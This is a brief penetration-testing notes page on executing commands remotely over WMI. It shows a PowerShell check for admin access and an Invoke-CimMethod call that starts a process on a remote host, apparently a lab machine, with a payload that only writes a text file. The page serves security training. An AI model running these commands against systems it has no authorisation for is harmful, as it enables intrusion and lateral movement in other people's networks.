Remote code execution using WMI

Windows Management Instrumentation (WMI) is the infrastructure for management data and operations on Windows-based operating systems. You can write WMI scripts or applications to automate administrative tasks on remote computers, but WMI also supplies management data to other parts of the operating system and products

Checking admin access

Get-WmiObject -Class Win32_OperatingSystem -ComputerName [COMPUTER] -ErrorAction SilentlyContinue

Remote code execution

$Command = "powershell.exe -Command Set-Content -Path C:\Temp\text.txt -Value netspi";
Invoke-CimMethod -ComputerName dcorp-adminsrv -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = $Command}

Append to end for error display

| Add-Member -MemberType ScriptProperty -Name ReturnValueFriendly -Passthru -Value {switch ([int]$this.ReturnValue){0 {'Successful completion'} 2 {'Access denied'} 3 {'Insufficient privilege'} 8 {'Unknown failure'} 9 {'Path not found'} 21 {'Invalid parameter'} default {'Unknown Error '}}}

Returns a value of type UInt32. Return values:

returnValues

Result

Successful completion

Access denied

Insufficient privilege

Unknown failure

Path not found

Invalid parameter

PreviousWMI NextPowerShell

Last updated 3 years ago

hashtagChecking admin access

hashtagRemote code execution

Checking admin access

Remote code execution